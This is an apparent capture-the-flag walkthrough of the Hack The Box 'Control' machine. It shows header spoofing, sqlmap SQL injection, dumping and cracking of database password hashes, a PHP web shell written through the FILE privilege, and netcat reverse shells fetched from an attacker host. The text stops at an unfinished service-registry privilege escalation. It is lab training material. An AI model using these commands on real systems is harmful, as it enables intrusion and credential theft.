Control HTB Writeup
Hello fellow hackers,
This is the writeup for Control box.
As Always I did a port scan with the famous nmap and got 3 ports open.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings:
| NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SMBProgNeg, TLSSessionReq, TerminalServerCookie, X11Probe, afp, giop:
|_ Host '10.10.14.41' is not allowed to connect to this MariaDB server
Port 80
I can tell from now this uses php(index.php). Inside the source code I see a comment
<!-- To Do:
- Import Products
- Link to new payment system
- Enable SSL (Certificates location \\192.168.4.28\myfiles)
<!-- Header -->After poking the website I see that admin.php is not accessible. Because it requires us to go through a proxy.
Searching about headers I found out that header X-Forwarded-For is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy
So I open burp suite and intercept the request to 10.10.10.167/admin.php and add the IP address found in the index.php html code.
Now I add into burp suite math and replace the X-Forwarded-For, so burp can add that automatically to us.
Inside the admin app I can add, search, update, create products. I send each request on burp and try to find any vuln on the send parameters. I found out that search products is vulnerable to sql injection. After trying a sleep command. My request took long to respond back.
I copy the request to a file and then update the parameter to be productName=* . And then give it to sqlmap to extract info for us.
First I get all the databases with sqlmap -r sqlinjection.req --dbs --batch
[*] information_schema
[*] mysql
[*] warehouseAfter get all mysql tables with sqlmap -r sqlinjection -D mysql --tables --batch
Database: mysql
[31 tables]
+---------------------------+
| db |
| event |
| user |
| column_stats |
| columns_priv |
| func |
| general_log |
| global_priv |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
After get the content of user row sqlmap -r sqlinjection.req -D mysql -T user --dump
root: 0A4A5CAD344718DC418035A1F4D292BA603134D8
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9DAdd the hashes inside a file and then crack them hashcat -m 300 crackme.txt rockyou.txt
root: 0A4A5CAD344718DC418035A1F4D292BA603134D8
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA * l3tm3!n
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9D l33th4x0rhector- The manager hash was cracked with sqlmap
sqlmap -r sqlinjection.req -D mysql -T user --dump --batch
Let’s see again if we can upload a shell to the webserver and then access the server.
To do this first I check which users is managing the mysql database. sqlmap -r sqlinjection.req --current-user --batch
current user: 'manager@localhost'
And then check the privileges of that user. sqlmap -r sqlinjection.req --privileges --batch
[*] 'manager'@'localhost' [1]:
privilege: FILE which means we can indeed upload a file into the webserver.
I create a file and add a simple php command to execute everything I give into the fuxsocy parameter.
<?php echo system($_GET['fuxsocy']); ?>To upload a file I use sqlmap -r sqlinjection.req --file-write=q.php --file-dest=/inetpub/wwwroot/q.php --batch
I had to guess for the destination by trying possible directories found here
Then I visit the webpage and download nc.exe from my box and execute it to get a reverse shell.
10.10.10.167/q.php?fuxsocy=curl 10.10.X.X/nc.exe > C:\Windows\Temp\nc.exe (add a webserver first with python3 -m http.server 80)
10.10.10.167/q.php?fuxsocy=C:\Windows\Temp\nc.exe 10.10.X.X 9999 -e powershell.exe kali@kali:~$ rlwrap nc -nvlp 9999
listening on [any] 9999 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.10.167] 50431
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\wwwroot> whoami
whoami
nt authority\iusr
PS C:\inetpub\wwwroot>Because I have the password for user hector I created a script to impersonate that user and then download the nc.exe and after get a shell back as that user.
$pass = ConvertTo-SecureString "l33th4x0rhector" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Fidelity\\hector", $pass)
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {curl http://10.10.X.X/nc.exe -O C:\Users\hector\Desktop\nc.exe}
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {C:\Users\hector\Desktop\nc.exe 10.10.X.X 8888 -e powershell}
User obtained.
The root part has to do with windows registry. To spot that we had to look into the users powershell history.
PS C:\Users\Hector\Documents> (Get-PSReadLineOption).HistorySavePath
(Get-PSReadLineOption).HistorySavePath
C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Hector\Documents> type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
PS C:\Users\Hector\Documents>Running get-acl HKLM:\SYSTEM\CurrentControlSet\services* | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
CONTROL\Hector Allow FullControl <--- USER HERE HAS FULLCONTROL
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
Audit :
Sddl : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KA;;;S-1-5-21-3271572904-80546332
-2170161114-1000)(A;CI;KR;;;AC)This means we can edit registries for a service and then execute malicious code which in our case is a reverse shell as administrator. First let’s see the services what hector has access to by issuing this command.Get-acl HKLM:\System\CurrentControlSet\Services\* | Format-List * | findstr /i "Hector Users Path" This gives us a big list with the proccess name. We would choose wuauserv.
PS C:\Users\Hector\Documents> Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv
Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv
Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Name Property
---- --------
wuauserv DependOnService : {rpcss}
Description : @%systemroot%\system32\wuaueng.dll,-106
DisplayName : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl : 1
FailureActions : {128, 81, 1, 0...}
ImagePath : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName : LocalSystem
RequiredPrivileges : {SeAuditPrivilege, SeCreateGlobalPrivilege,
SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType : 1
Start : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB : 167
SvcMemSoftLimitInMB : 88
Type : 32
PS C:\Users\Hector\Documents>
I am using the wuauserv service as this service is the service windows use to check if an update is available and then stops so this should have a good chance to be inactive.
Let’s edit the ImagePath
setup listener and download nc then start the service.
